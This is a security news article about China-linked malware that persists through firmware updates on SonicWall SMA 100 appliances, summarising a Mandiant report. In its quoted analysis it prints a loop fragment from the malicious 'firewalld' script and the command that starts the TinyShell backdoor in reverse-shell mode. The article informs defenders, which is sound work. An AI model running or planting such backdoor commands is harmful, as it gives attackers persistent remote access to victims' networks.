Zerosecurity
  • Home
  • Security
    • Exploits
    • Mobile Security
  • Malware
  • Data Breaches
  • Crypto
  • Privacy
  • Downloads
    • Malwarebytes
    • Exploits
    • Paper Downloads
    • Software & Service Reviews
No Result
View All Result
SUBSCRIBE
Zerosecurity
  • Home
  • Security
    • Exploits
    • Mobile Security
  • Malware
  • Data Breaches
  • Crypto
  • Privacy
  • Downloads
    • Malwarebytes
    • Exploits
    • Paper Downloads
    • Software & Service Reviews
No Result
View All Result
Zerosecurity
No Result
View All Result
Home Malware

Update-resistant malware infects SonicWall security appliances

Paul Anderson by Paul Anderson
March 12, 2023
in Malware
0
Sonicwall persistent malware
76
SHARES
1.2k
VIEWS
Share on FacebookShare on Twitter

Researchers have discovered that threat actors linked to the Chinese government are using malware to infect SonicWall’s Secure Mobile Access 100, a popular security appliance, which remains active even after firmware updates.

You might also like

Netwire RAT seized by FBI and other worldwide police agencies

The Emotet botnet returns and is sending a slew of malicious emails

Fake ChatGPT websites are popping up and spreading malware

The Secure Mobile Access 100 is a highly sought-after device for businesses looking to deploy remote workforces. It provides granular access controls to remote users, VPN connections to organizational networks, and the ability to set unique profiles for each employee. Due to the access, it provides to customer networks, the SMA 100 is an attractive target for hackers.

Last year, the SMA 100 was targeted by highly skilled hackers who took advantage of a zero-day vulnerability. Unfortunately, this is not the first time security appliances have been compromised in recent years, with Fortinet and Pulse Secure also falling victim to similar attacks.

Malware gaining persistence

A new report published on Thursday by cybersecurity firm Mandiant has revealed that threat actors, believed to have links to China, are currently executing a targeted campaign to establish long-term persistence by deploying malware on unpatched SonicWall SMA appliances. The campaign has caught the attention of security experts due to the malware’s ability to remain active on the devices even after the firmware has been updated.

“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”

In order to maintain its hold on a compromised device, the malicious software implements a clever tactic. The malware constantly scans for new firmware updates, conducting checks every 10 seconds. If an update is detected, the malware springs into action: it makes a backup copy of the archived file, extracts the contents, and then proceeds to copy over its own nefarious files. The malware even adds a backdoor root user to the system, ensuring future access. Finally, the malware rearchives the file, preparing it for installation.

“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers added.

An attack campaign in 2021 utilized 16 malware families to infiltrate Pulse Secure devices. This campaign displayed persistence techniques, indicating a sophisticated and well-planned operation. Mandiant has attributed these attacks to several threat groups, including UNC2630 and UNC2717. These groups are aligned with “key Chinese government priorities,” but it’s unclear whether the Chinese government is directly involved in the attacks.

Mandiant is now tracking those responsible for the ongoing attacks against SonicWall SMA 100 customers as UNC4540.

“In recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of Internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term,” the researchers added in Thursday’s report.

Gaining privileges

The malware’s primary objective seems to be the pilfering of cryptographically hashed passwords for all users who are currently logged into their systems. In addition to this, the malicious software also provides the threat actor with a web shell, which they can leverage to install fresh malware onto the infected device.

Analysis of a compromised device revealed a collection of files that give the attacker a highly privileged and available access to the appliance,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well-tailored to the system to provide stability and persistence.

The main malware entry point is a bash script named firewalld, which executes its primary loop once for a count of every file on the system squared: …for j in $(ls / -R) do for i in $(ls / -R) do:… The script is responsible for executing an SQL command to accomplish credential stealing and execution of the other components.

The first function in firewalld executes the TinyShell backdoor httpsd with command nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & if the httpsd process isn’t already running. This sets TinyShell to reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary embeds a hard coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind shell mode available.

According to researchers, the source of the initial infection remains a mystery. SonicWall issued a notice last week recommending that SMA 100 users upgrade to version 10.2.1.7 or newer.

These updated versions offer valuable features, such as File Integrity Monitoring and anomalous process identification, which could help detect and prevent further breaches.

The patch is readily available for download on their website. Additionally, users are advised to monitor system logs frequently for any signs of abnormal activity, such as unusual login attempts or internal network traffic. By staying vigilant, users can take proactive steps to protect their systems and data from potential cyber-attacks.

Tags: PersistenceSonicWall
Share31Tweet19
Paul Anderson

Paul Anderson

Editor and chief at ZeroSecurity. Expertise includes programming, malware analysis, and penetration testing. If you would like to write for ZeroSecurity, please click "Contact us" at the top of the page.

Recommended For You

Netwire RAT seized by FBI and other worldwide police agencies

by Christi Rogalski
March 16, 2023
0
Netwire RAT seized by FBI and other worldwide police agencies

The FBI, in partnership with several police agencies worldwide, has carried out an international law enforcement operation resulting in the arrest of a suspected administrator of the NetWire...

Read more

The Emotet botnet returns and is sending a slew of malicious emails

by Kyle
March 14, 2023
0
The Emotet botnet returns and is sending a slew of malicious emails

The notorious Emotet botnet, considered one of the biggest threats to internet security, has resurfaced after a prolonged hiatus, armed with new tactics. The botnet's trademark strategy of...

Read more

Fake ChatGPT websites are popping up and spreading malware

by Paul Anderson
March 1, 2023 - Updated on March 2, 2023
0
ChatGPT is found spreading malware created in Python

It was only a matter of time before hackers would start using the growing popularity of ChatGPT to spread malware and steal sensitive personal information. Recently, multiple security...

Read more

BlueSky Ransomware Infects KMSAuto Activator users

by Kyle
July 20, 2022 - Updated on July 22, 2022
0
BlueSky Ransomware backdoors KMSAuto activator

A financially motivated threat actor has been discovered spreading a new ransomware strain, dubbed BlueSky. The group is believed to be connected to the Conti ransomware group. CloudSEK's...

Read more

Syslogk Linux Rootkit triggers with magic packets

by Christi Rogalski
June 19, 2022 - Updated on June 20, 2022
0
Syslogk Linux Rootkit triggers with magic packets

Avast researchers have spotted a Linux rootkit that has the ability to hide malicious processes. The new Linux rootkit, called Syslogk, works by using magic packets to activate...

Read more
Next Post
The Emotet botnet returns and is sending a slew of malicious emails

The Emotet botnet returns and is sending a slew of malicious emails

Related News

BreachForums Owner Arrested and Charged

BreachForums Owner Arrested and Charged

March 17, 2023
ChipMixer platform tied to crypto laundering scheme – seized by authorities

ChipMixer platform tied to crypto laundering scheme – seized by authorities

March 17, 2023
NSA intercepting U.S. Routers

NSA intercepting U.S. Routers

June 6, 2014 - Updated on March 17, 2023
Zerosecurity

We cover the latest in Information Security & Blockchain news, as well as threat trends targeting both sectors.

Categories

  • Crypto
  • Data Breaches
  • DotNet Framework
  • Downloads
  • Exploits
  • Exploits
  • Information
  • Legal
  • Malware
  • Malware Analysis
  • Mobile Security
  • Paper Downloads
  • Piracy
  • Privacy
  • Programming
  • Public
  • Security
  • Security
  • Software & Service Reviews
  • Technology News
  • Tools
  • Tutorials
  • Video Tutorials
  • Whitepapers
  • Zero Security
  • Contact Us
  • List of our Writers

© 2022 ZeroSecurity, All Rights Reserved.

No Result
View All Result
  • Home
  • Security
  • Exploits
  • Data Breaches
  • Malware
  • Privacy
  • Mobile Security
  • Tools
  • Contact Us
  • Privacy Policy

© 2022 ZeroSecurity, All Rights Reserved.